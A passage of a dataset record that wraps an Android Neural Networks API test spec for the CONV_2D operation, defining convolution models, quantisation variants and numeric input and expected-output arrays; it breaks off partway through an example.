hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a70863429d755efb2d9623086fbc36d16f9caa99 | 42,197 | py | Python | runtime/test/specs/V1_2/conv2d_v1_2.mod.py | aosp-goes-brrbrr/packages_modules_NeuralNetworks | 87a14e21ce905ce7c4584fe9a53e4397a4d33c67 | [
"Apache-2.0"
] | null | null | null | runtime/test/specs/V1_2/conv2d_v1_2.mod.py | aosp-goes-brrbrr/packages_modules_NeuralNetworks | 87a14e21ce905ce7c4584fe9a53e4397a4d33c67 | [
"Apache-2.0"
] | null | null | null | runtime/test/specs/V1_2/conv2d_v1_2.mod.py | aosp-goes-brrbrr/packages_modules_NeuralNetworks | 87a14e21ce905ce7c4584fe9a53e4397a4d33c67 | [
"Apache-2.0"
] | 2 | 2021-11-28T11:20:31.000Z | 2021-11-28T11:28:38.000Z | #
# Copyright (C) 2018 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
layout = BoolScalar("layout", False) # NHWC
# TEST 1: CONV_NCHW_1
i1 = Input("op1", "TENSOR_FLOAT32", "{1, 3, 3, 1}")
f1 = Parameter("op2", "TENSOR_FLOAT32", "{1, 2, 2, 1}", [.25, .25, .25, .25])
b1 = Parameter("op3", "TENSOR_FLOAT32", "{1}", [0])
o1 = Output("op4", "TENSOR_FLOAT32", "{1, 2, 2, 1}")
Model().Operation("CONV_2D", i1, f1, b1, 0, 0, 0, 0, 1, 1, 0, layout).To(o1)
# Additional data type
quant8 = DataTypeConverter().Identify({
i1: ("TENSOR_QUANT8_ASYMM", 0.5, 0),
f1: ("TENSOR_QUANT8_ASYMM", 0.125, 0),
b1: ("TENSOR_INT32", 0.0625, 0),
o1: ("TENSOR_QUANT8_ASYMM", 0.125, 0)
})
channelQuant8 = DataTypeConverter().Identify({
i1: ("TENSOR_QUANT8_ASYMM", 0.5, 0),
f1: ("TENSOR_QUANT8_SYMM_PER_CHANNEL", 0, 0, SymmPerChannelQuantParams(channelDim=0, scales=[0.125])),
b1: ("TENSOR_INT32", 0.0, 0, SymmPerChannelQuantParams(channelDim=0, scales=[0.0625], hide=True)),
o1: ("TENSOR_QUANT8_ASYMM", 0.125, 0)
})
# Instantiate an example
example = Example({
i1: [1.0, 1.0, 1.0, 1.0, 0.5, 1.0, 1.0, 1.0, 1.0],
o1: [.875, .875, .875, .875]
}).AddNchw(i1, o1, layout).AddVariations("relaxed", quant8, channelQuant8, "float16")
# TEST 2: CONV_NCHW_2
i2 = Input("op1", "TENSOR_FLOAT32", "{1, 3, 4, 1}")
f2 = Parameter("op2", "TENSOR_FLOAT32", "{1, 3, 3, 1}", [1, 4, 7, 2, 5, 8, 3, 6, 9])
b2 = Parameter("op3", "TENSOR_FLOAT32", "{1}", [-200])
o2 = Output("op4", "TENSOR_FLOAT32", "{1, 3, 4, 1}")
Model().Operation("CONV_2D", i2, f2, b2, 1, 1, 1, 1, layout).To(o2)
# Additional data type
quant8 = DataTypeConverter().Identify({
i2: ("TENSOR_QUANT8_ASYMM", 0.5, 127),
f2: ("TENSOR_QUANT8_ASYMM", 0.5, 127),
b2: ("TENSOR_INT32", 0.25, 0),
o2: ("TENSOR_QUANT8_ASYMM", 1.0, 50)
})
channelQuant8 = DataTypeConverter().Identify({
i2: ("TENSOR_QUANT8_ASYMM", 0.5, 127),
f2: ("TENSOR_QUANT8_SYMM_PER_CHANNEL", 0, 0, SymmPerChannelQuantParams(channelDim=0, scales=[0.5])),
b2: ("TENSOR_INT32", 0.0, 0, SymmPerChannelQuantParams(channelDim=0, scales=[0.25], hide=True)),
o2: ("TENSOR_QUANT8_ASYMM", 1.0, 50)
})
# Instantiate an example
example = Example({
i2: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12],
o2: [0, 0, 0, 0, 35, 112, 157, 0, 0, 34, 61, 0]
}).AddNchw(i2, o2, layout).AddVariations("relaxed", quant8, channelQuant8, "float16")
# TEST 3: CONV_NCHW_CHANNEL
i3 = Input("op1", "TENSOR_FLOAT32", "{1, 1, 1, 3}")
f3 = Parameter("op2", "TENSOR_FLOAT32", "{3, 1, 1, 3}", [0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0, 4.5])
b3 = Parameter("op3", "TENSOR_FLOAT32", "{3}", [0., 0., 0.])
o3 = Output("op4", "TENSOR_FLOAT32", "{1, 1, 1, 3}")
Model("channel").Operation("CONV_2D", i3, f3, b3, 0, 0, 0, 0, 1, 1, 0, layout).To(o3)
# Additional data type
quant8 = DataTypeConverter().Identify({
i3: ("TENSOR_QUANT8_ASYMM", 0.5, 0),
f3: ("TENSOR_QUANT8_ASYMM", 0.5, 0),
b3: ("TENSOR_INT32", 0.25, 0),
o3: ("TENSOR_QUANT8_ASYMM", 0.5, 0)
})
channelQuant8 = DataTypeConverter().Identify({
i3: ("TENSOR_QUANT8_ASYMM", 0.5, 0),
f3: ("TENSOR_QUANT8_SYMM_PER_CHANNEL", 0, 0, SymmPerChannelQuantParams(channelDim=0, scales=[0.5, 0.4, 0.3])),
b3: ("TENSOR_INT32", 0.0, 0, SymmPerChannelQuantParams(channelDim=0, scales=[0.25, 0.2, 0.15], hide=True)),
o3: ("TENSOR_QUANT8_ASYMM", 0.5, 0)
})
# Instantiate an example
example = Example({
i3: [5., 5., 5.],
o3: [15., 37.5, 60.]
}).AddNchw(i3, o3, layout).AddVariations("relaxed", quant8, channelQuant8, "float16")
# TEST 4: CONV_NCHW_LARGE
i4 = Input("op1", "TENSOR_FLOAT32", "{1, 2, 3, 3}")
f4 = Parameter("op2", "TENSOR_FLOAT32", "{3, 1, 1, 3}", [1., 4., 7., 2., 5., 8., 3., 6., 9.])
b4 = Parameter("op3", "TENSOR_FLOAT32", "{3}", [0., 0., 0.])
o4 = Output("op4", "TENSOR_FLOAT32", "{1, 2, 3, 3}")
Model("large").Operation("CONV_2D", i4, f4, b4, 0, 0, 0, 0, 1, 1, 0, layout).To(o4)
# Additional data type
quant8 = DataTypeConverter().Identify({
i4: ("TENSOR_QUANT8_ASYMM", 0.5, 128),
f4: ("TENSOR_QUANT8_ASYMM", 0.5, 128),
b4: ("TENSOR_INT32", 0.25, 0),
o4: ("TENSOR_QUANT8_ASYMM", 2.0, 0)
})
channelQuant8 = DataTypeConverter().Identify({
i4: ("TENSOR_QUANT8_ASYMM", 0.5, 128),
f4: ("TENSOR_QUANT8_SYMM_PER_CHANNEL", 0, 0, SymmPerChannelQuantParams(channelDim=0, scales=[0.5, 1.0, 0.5])),
b4: ("TENSOR_INT32", 0.0, 0, SymmPerChannelQuantParams(channelDim=0, scales=[0.25, 0.5, 0.25], hide=True)),
o4: ("TENSOR_QUANT8_ASYMM", 2.0, 0)
})
channelQuant8_mult_gt_1 = DataTypeConverter().Identify({
i4: ("TENSOR_QUANT8_ASYMM", 1.0, 127),
f4: ("TENSOR_QUANT8_SYMM_PER_CHANNEL", 0, 0, SymmPerChannelQuantParams(channelDim=0, scales=[0.5, 1.0, 1.005])),
b4: ("TENSOR_INT32", 0.0, 0, SymmPerChannelQuantParams(channelDim=0, scales=[0.5, 1.0, 1.005], hide=True)),
o4: ("TENSOR_QUANT8_ASYMM", 1.0, 127)
})
# Instantiate an example
example = Example({
i4: [1., 2., 3., 4., 5., 6., 7., 8., 9.,
10., 11., 12., 13., 14., 15., 16., 17., 18.],
o4: [30., 36., 42.,
66., 81., 96.,
102., 126., 150.,
138., 171., 204.,
174., 216., 258.,
210., 261., 312.]
}).AddNchw(i4, o4, layout).AddVariations("relaxed", quant8, channelQuant8, channelQuant8_mult_gt_1, "float16")
# TEST 5/6: CONV_1_H3_W2_[SAME|VALID]
i5 = Input("op1", "TENSOR_FLOAT32", "{1, 8, 8, 3}")
f5 = Parameter("op2", "TENSOR_FLOAT32", "{1, 3, 2, 3}", [-0.966213, -0.467474, -0.82203, -0.579455, 0.0278809, -0.79946, -0.684259, 0.563238, 0.37289, 0.738216, 0.386045, -0.917775, 0.184325, -0.270568, 0.82236, 0.0973683, -0.941308, -0.144706])
b5 = Parameter("op3", "TENSOR_FLOAT32", "{1}", [0.])
o5 = Output("op4", "TENSOR_FLOAT32", "{1, 8, 8, 1}")
o6 = Output("op4", "TENSOR_FLOAT32", "{1, 6, 7, 1}")
model_1_same = Model("1_H3_W2_SAME").Operation("CONV_2D", i5, f5, b5, 1, 1, 1, 0, layout).To(o5)
model_1_valid = Model("1_H3_W2_VALID").Operation("CONV_2D", i5, f5, b5, 2, 1, 1, 0, layout).To(o6)
example = Example({
i5: [-0.869931, 0.644628, -0.918393, 0.153672, 0.868562, -0.358177, -0.134931, -0.247565, 0.22174, -0.259157, -0.284296, -0.538065, 0.765559, 0.41986, -0.556241, 0.658494, 0.214355, -0.850169, -0.252893, -0.478935, 0.530526, -0.0700663, -0.988729, -0.303061, 0.150845, 0.829915, 0.476349, 0.406537, -0.355343, 0.757145, -0.356362, 0.800482, -0.713861, 0.210483, -0.634303, 0.718236, -0.752038, 0.457547, -0.550769, -0.551178, 0.446766, -0.227462, 0.216348, -0.852806, -0.351486, 0.55906, -0.668493, -0.303493, -0.363763, -0.162837, 0.0701012, 0.756097, -0.142269, 0.329724, -0.656317, -0.998086, -0.652949, -0.40316, -0.893682, 0.432744, 0.612362, -0.869588, -0.71327, -0.398092, -0.0423559, 0.436576, -0.925272, 0.176549, 0.822904, 0.096833, -0.296802, -0.427195, 0.031654, -0.254479, 0.244905, 0.0948254, 0.643769, -0.90391, 0.352665, -0.901179, 0.266159, -0.968068, -0.615401, -0.388975, 0.939052, -0.116289, 0.107523, -0.0582711, 0.435172, 0.334675, 0.459711, 0.717436, 0.496627, -0.680175, -0.415066, 0.339848, 0.506004, -0.337808, -0.107218, -0.172496, 0.870638, 0.931872, -0.953884, 0.903042, 0.760078, 0.209727, -0.285384, -0.45514, 0.113194, 0.0756611, 0.0924435, -0.472863, 0.960609, -0.160385, -0.839445, 0.457097, 0.163348, 0.344867, -0.131619, 0.688715, -0.540827, 0.571259, -0.95587, 0.506164, -0.155839, 0.0789621, 0.756772, -0.662069, 0.242908, 0.460821, 0.177872, -0.289839, -0.640603, 0.702598, -0.506406, -0.568262, -0.0713716, 0.413792, 0.159673, -0.305208, 0.133816, -0.160254, 0.787323, -0.753244, 0.600721, 0.263186, -0.162387, 0.477962, -0.702951, -0.731036, -0.939481, -0.524519, 0.934072, -0.511637, -0.503499, 0.106236, -0.323684, 0.534444, -0.843745, 0.364171, 0.0370358, -0.168801, -0.404559, -0.814178, 0.91745, -0.334276, 0.66925, -0.801201, 0.156511, -0.427949, 0.379153, 0.818597, -0.649902, 0.427087, -0.586015, -0.559789, -0.833923, 0.0892409, -0.621251, 0.213826, 0.465509, 0.4704, 0.380261, 0.413067, 0.180822, 0.172866, 0.59614, 0.825575, 0.662916, -0.704381, -0.297631, 0.697778],
o5: [1.85284, -0.0393656, -0.127353, 1.43115, -0.302294, -1.0402, 0.655023, -0.587614, 1.72003, 1.55816, 0.667546, 2.23663, 0.0661516, 0.290254, 0.770222, -0.346357, -1.58197, -0.850595, -0.484224, 0.949967, -0.577263, -0.871949, 2.34132, -0.104506, -0.135965, -0.985713, 0.815147, 1.03114, -1.41915, -0.515534, -0.373639, 1.42026, -1.50604, 0.673113, 3.06139, -0.388578, -1.76707, -0.315667, -1.03815, -0.343435, 0.432787, -1.41643, 1.12944, -0.175806, -0.846415, 1.40095, 0.70832, -1.46717, 2.19562, -2.61266, -0.705383, 1.26124, 1.46545, -2.35761, 2.04494, 1.23741, -0.527402, -0.39954, -0.0128623, 1.3644, 0.985755, -0.718118, -0.1008, 1.24327]
}, {
i5: [-0.295335, -0.00387601, -0.552251, 0.166084, -0.28482, -0.152143, -0.719885, -0.869386, -0.745598, 0.823947, 0.473183, -0.331337, 0.187631, 0.0426571, -0.826897, -0.755085, -0.472453, -0.0233656, 0.0483436, 0.933418, -0.961974, 0.0125783, 0.219742, 0.342604, -0.15166, 0.0934905, 0.783221, 0.129664, 0.838844, -0.271388, 0.924519, 0.342843, 0.274418, 0.350817, 0.841638, -0.543993, -0.00283395, -0.128467, -0.682943, -0.319117, 0.84634, 0.283003, 0.32865, 0.0293755, -0.0335696, 0.591266, -0.0743476, -0.741271, 0.462056, -0.583625, -0.590183, 0.6234, 0.535269, -0.670818, -0.955642, -0.770173, 0.479986, 0.664377, 0.399445, -0.968874, -0.276263, -0.901951, 0.544104, -0.958981, 0.482658, -0.807284, 0.305369, -0.947818, 0.827498, -0.382887, -0.805741, -0.796678, -0.299804, -0.229828, 0.818783, -0.103055, -0.45568, -0.227827, 0.543743, -0.96073, 0.946747, -0.857182, -0.96426, -0.292411, -0.715614, 0.765278, -0.475043, -0.590142, -0.238507, 0.673002, -0.473357, -0.319626, 0.936014, 0.486607, 0.580844, 0.425352, -0.800994, 0.290763, -0.494953, -0.441162, 0.718677, -0.828427, 0.96965, 7.53637e-05, -0.699973, -0.526886, -0.352682, 0.799466, 0.332789, 0.723389, 0.407659, -0.934084, -0.284705, 0.961484, -0.700395, -0.985808, -0.595342, -0.691721, 0.49448, -0.0842649, 0.0390966, 0.298938, -0.128094, -0.97158, 0.86393, 0.270606, -0.468986, -0.256605, 0.47215, -0.273117, -0.590343, -0.826529, -0.725381, -0.194821, -0.259661, -0.0949207, -0.180302, 0.0446834, -0.222133, -0.40393, 0.295772, -0.92949, 0.580079, -0.169856, 0.330311, 0.0173551, -0.635823, 0.475942, 0.907175, 0.242777, -0.512208, 0.362463, 0.0496289, 0.65171, 0.990057, 0.690733, -0.469013, -0.101311, -0.68372, -0.157841, -0.677711, -0.708224, -0.659437, -0.407607, 0.677033, 0.89032, 0.228307, -0.749514, 0.772958, 0.054701, 0.551705, 0.917052, -0.895022, -0.702397, 0.484142, 0.108648, 0.833347, 0.478872, -0.984112, 0.387176, -0.73299, 0.7526, 0.443312, -0.0987856, 0.125415, 0.10876, -0.498108, 0.43209, 0.344609, 0.928941, -0.130732, -0.0569167],
o5: [-0.000614278, -1.21221, 0.443861, 0.102117, -2.52714, 1.47489, 0.173474, -0.237577, 1.28735, 1.91315, 2.51734, 0.375841, 0.637563, 2.653, 2.72959, -1.6271, 1.17389, -2.12119, 2.91417, -2.24246, 0.0497045, -0.127107, -0.144473, -0.133762, -0.393284, -2.02346, -0.239178, -0.246508, 1.29277, 1.32963, 0.117521, 1.22372, 0.0665713, 1.09438, -1.31426, 2.52594, -0.969211, 0.515478, -1.60926, -0.838905, 0.135211, 0.786415, -1.14382, -0.739102, -1.01731, 0.281615, 2.36311, 0.891823, 1.93872, -0.150491, 3.45217, 2.28219, 1.18282, -2.25086, 3.05468, 0.166228, 0.434554, -2.57529, -0.958662, -2.23978, 2.66776, 0.542601, 1.76107, -1.08134]
}, model=model_1_same).AddNchw(i5, o5, layout).AddVariations("relaxed", "float16")
example = Example({
i5: [-0.869931, 0.644628, -0.918393, 0.153672, 0.868562, -0.358177, -0.134931, -0.247565, 0.22174, -0.259157, -0.284296, -0.538065, 0.765559, 0.41986, -0.556241, 0.658494, 0.214355, -0.850169, -0.252893, -0.478935, 0.530526, -0.0700663, -0.988729, -0.303061, 0.150845, 0.829915, 0.476349, 0.406537, -0.355343, 0.757145, -0.356362, 0.800482, -0.713861, 0.210483, -0.634303, 0.718236, -0.752038, 0.457547, -0.550769, -0.551178, 0.446766, -0.227462, 0.216348, -0.852806, -0.351486, 0.55906, -0.668493, -0.303493, -0.363763, -0.162837, 0.0701012, 0.756097, -0.142269, 0.329724, -0.656317, -0.998086, -0.652949, -0.40316, -0.893682, 0.432744, 0.612362, -0.869588, -0.71327, -0.398092, -0.0423559, 0.436576, -0.925272, 0.176549, 0.822904, 0.096833, -0.296802, -0.427195, 0.031654, -0.254479, 0.244905, 0.0948254, 0.643769, -0.90391, 0.352665, -0.901179, 0.266159, -0.968068, -0.615401, -0.388975, 0.939052, -0.116289, 0.107523, -0.0582711, 0.435172, 0.334675, 0.459711, 0.717436, 0.496627, -0.680175, -0.415066, 0.339848, 0.506004, -0.337808, -0.107218, -0.172496, 0.870638, 0.931872, -0.953884, 0.903042, 0.760078, 0.209727, -0.285384, -0.45514, 0.113194, 0.0756611, 0.0924435, -0.472863, 0.960609, -0.160385, -0.839445, 0.457097, 0.163348, 0.344867, -0.131619, 0.688715, -0.540827, 0.571259, -0.95587, 0.506164, -0.155839, 0.0789621, 0.756772, -0.662069, 0.242908, 0.460821, 0.177872, -0.289839, -0.640603, 0.702598, -0.506406, -0.568262, -0.0713716, 0.413792, 0.159673, -0.305208, 0.133816, -0.160254, 0.787323, -0.753244, 0.600721, 0.263186, -0.162387, 0.477962, -0.702951, -0.731036, -0.939481, -0.524519, 0.934072, -0.511637, -0.503499, 0.106236, -0.323684, 0.534444, -0.843745, 0.364171, 0.0370358, -0.168801, -0.404559, -0.814178, 0.91745, -0.334276, 0.66925, -0.801201, 0.156511, -0.427949, 0.379153, 0.818597, -0.649902, 0.427087, -0.586015, -0.559789, -0.833923, 0.0892409, -0.621251, 0.213826, 0.465509, 0.4704, 0.380261, 0.413067, 0.180822, 0.172866, 0.59614, 0.825575, 0.662916, -0.704381, -0.297631, 0.697778],
o6: [1.72003, 1.55816, 0.667546, 2.23663, 0.0661516, 0.290254, 0.770222, -1.58197, -0.850595, -0.484224, 0.949967, -0.577263, -0.871949, 2.34132, -0.135965, -0.985713, 0.815147, 1.03114, -1.41915, -0.515534, -0.373639, -1.50604, 0.673113, 3.06139, -0.388578, -1.76707, -0.315667, -1.03815, 0.432787, -1.41643, 1.12944, -0.175806, -0.846415, 1.40095, 0.70832, 2.19562, -2.61266, -0.705383, 1.26124, 1.46545, -2.35761, 2.04494, ]
}, {
i5: [-0.295335, -0.00387601, -0.552251, 0.166084, -0.28482, -0.152143, -0.719885, -0.869386, -0.745598, 0.823947, 0.473183, -0.331337, 0.187631, 0.0426571, -0.826897, -0.755085, -0.472453, -0.0233656, 0.0483436, 0.933418, -0.961974, 0.0125783, 0.219742, 0.342604, -0.15166, 0.0934905, 0.783221, 0.129664, 0.838844, -0.271388, 0.924519, 0.342843, 0.274418, 0.350817, 0.841638, -0.543993, -0.00283395, -0.128467, -0.682943, -0.319117, 0.84634, 0.283003, 0.32865, 0.0293755, -0.0335696, 0.591266, -0.0743476, -0.741271, 0.462056, -0.583625, -0.590183, 0.6234, 0.535269, -0.670818, -0.955642, -0.770173, 0.479986, 0.664377, 0.399445, -0.968874, -0.276263, -0.901951, 0.544104, -0.958981, 0.482658, -0.807284, 0.305369, -0.947818, 0.827498, -0.382887, -0.805741, -0.796678, -0.299804, -0.229828, 0.818783, -0.103055, -0.45568, -0.227827, 0.543743, -0.96073, 0.946747, -0.857182, -0.96426, -0.292411, -0.715614, 0.765278, -0.475043, -0.590142, -0.238507, 0.673002, -0.473357, -0.319626, 0.936014, 0.486607, 0.580844, 0.425352, -0.800994, 0.290763, -0.494953, -0.441162, 0.718677, -0.828427, 0.96965, 7.53637e-05, -0.699973, -0.526886, -0.352682, 0.799466, 0.332789, 0.723389, 0.407659, -0.934084, -0.284705, 0.961484, -0.700395, -0.985808, -0.595342, -0.691721, 0.49448, -0.0842649, 0.0390966, 0.298938, -0.128094, -0.97158, 0.86393, 0.270606, -0.468986, -0.256605, 0.47215, -0.273117, -0.590343, -0.826529, -0.725381, -0.194821, -0.259661, -0.0949207, -0.180302, 0.0446834, -0.222133, -0.40393, 0.295772, -0.92949, 0.580079, -0.169856, 0.330311, 0.0173551, -0.635823, 0.475942, 0.907175, 0.242777, -0.512208, 0.362463, 0.0496289, 0.65171, 0.990057, 0.690733, -0.469013, -0.101311, -0.68372, -0.157841, -0.677711, -0.708224, -0.659437, -0.407607, 0.677033, 0.89032, 0.228307, -0.749514, 0.772958, 0.054701, 0.551705, 0.917052, -0.895022, -0.702397, 0.484142, 0.108648, 0.833347, 0.478872, -0.984112, 0.387176, -0.73299, 0.7526, 0.443312, -0.0987856, 0.125415, 0.10876, -0.498108, 0.43209, 0.344609, 0.928941, -0.130732, -0.0569167],
o6: [1.28735, 1.91315, 2.51734, 0.375841, 0.637563, 2.653, 2.72959, 1.17389, -2.12119, 2.91417, -2.24246, 0.0497045, -0.127107, -0.144473, -0.393284, -2.02346, -0.239178, -0.246508, 1.29277, 1.32963, 0.117521, 0.0665713, 1.09438, -1.31426, 2.52594, -0.969211, 0.515478, -1.60926, 0.135211, 0.786415, -1.14382, -0.739102, -1.01731, 0.281615, 2.36311, 1.93872, -0.150491, 3.45217, 2.28219, 1.18282, -2.25086, 3.05468]
}, model=model_1_valid).AddNchw(i5, o6, layout).AddVariations("relaxed", "float16")
# TEST 7/8: CONV_3_H3_W2_[SAME|VALID]
i7 = Input("op1", "TENSOR_FLOAT32", "{1, 8, 8, 3}")
f7 = Parameter("op2", "TENSOR_FLOAT32", "{3, 3, 2, 3}", [-0.966213, -0.579455, -0.684259, 0.738216, 0.184325, 0.0973683, -0.176863, -0.23936, -0.000233404, 0.055546, -0.232658, -0.316404, -0.012904, 0.320705, -0.326657, -0.919674, 0.868081, -0.824608, -0.467474, 0.0278809, 0.563238, 0.386045, -0.270568, -0.941308, -0.779227, -0.261492, -0.774804, -0.79665, 0.22473, -0.414312, 0.685897, -0.327792, 0.77395, -0.714578, -0.972365, 0.0696099, -0.82203, -0.79946, 0.37289, -0.917775, 0.82236, -0.144706, -0.167188, 0.268062, 0.702641, -0.412223, 0.755759, 0.721547, -0.43637, -0.274905, -0.269165, 0.16102, 0.819857, -0.312008])
b7 = Parameter("op3", "TENSOR_FLOAT32", "{3}", [0., 0., 0.])
o7 = Output("op4", "TENSOR_FLOAT32", "{1, 8, 8, 3}")
o8 = Output("op4", "TENSOR_FLOAT32", "{1, 6, 7, 3}")
model_3_same = Model("3_H3_W2_SAME").Operation("CONV_2D", i7, f7, b7, 1, 1, 1, 0, layout).To(o7)
model_3_valid = Model("3_H3_W2_VALID").Operation("CONV_2D", i7, f7, b7, 2, 1, 1, 0, layout).To(o8)
example = Example({
i7: [-0.869931, 0.644628, -0.918393, 0.153672, 0.868562, -0.358177, -0.134931, -0.247565, 0.22174, -0.259157, -0.284296, -0.538065, 0.765559, 0.41986, -0.556241, 0.658494, 0.214355, -0.850169, -0.252893, -0.478935, 0.530526, -0.0700663, -0.988729, -0.303061, 0.150845, 0.829915, 0.476349, 0.406537, -0.355343, 0.757145, -0.356362, 0.800482, -0.713861, 0.210483, -0.634303, 0.718236, -0.752038, 0.457547, -0.550769, -0.551178, 0.446766, -0.227462, 0.216348, -0.852806, -0.351486, 0.55906, -0.668493, -0.303493, -0.363763, -0.162837, 0.0701012, 0.756097, -0.142269, 0.329724, -0.656317, -0.998086, -0.652949, -0.40316, -0.893682, 0.432744, 0.612362, -0.869588, -0.71327, -0.398092, -0.0423559, 0.436576, -0.925272, 0.176549, 0.822904, 0.096833, -0.296802, -0.427195, 0.031654, -0.254479, 0.244905, 0.0948254, 0.643769, -0.90391, 0.352665, -0.901179, 0.266159, -0.968068, -0.615401, -0.388975, 0.939052, -0.116289, 0.107523, -0.0582711, 0.435172, 0.334675, 0.459711, 0.717436, 0.496627, -0.680175, -0.415066, 0.339848, 0.506004, -0.337808, -0.107218, -0.172496, 0.870638, 0.931872, -0.953884, 0.903042, 0.760078, 0.209727, -0.285384, -0.45514, 0.113194, 0.0756611, 0.0924435, -0.472863, 0.960609, -0.160385, -0.839445, 0.457097, 0.163348, 0.344867, -0.131619, 0.688715, -0.540827, 0.571259, -0.95587, 0.506164, -0.155839, 0.0789621, 0.756772, -0.662069, 0.242908, 0.460821, 0.177872, -0.289839, -0.640603, 0.702598, -0.506406, -0.568262, -0.0713716, 0.413792, 0.159673, -0.305208, 0.133816, -0.160254, 0.787323, -0.753244, 0.600721, 0.263186, -0.162387, 0.477962, -0.702951, -0.731036, -0.939481, -0.524519, 0.934072, -0.511637, -0.503499, 0.106236, -0.323684, 0.534444, -0.843745, 0.364171, 0.0370358, -0.168801, -0.404559, -0.814178, 0.91745, -0.334276, 0.66925, -0.801201, 0.156511, -0.427949, 0.379153, 0.818597, -0.649902, 0.427087, -0.586015, -0.559789, -0.833923, 0.0892409, -0.621251, 0.213826, 0.465509, 0.4704, 0.380261, 0.413067, 0.180822, 0.172866, 0.59614, 0.825575, 0.662916, -0.704381, -0.297631, 0.697778],
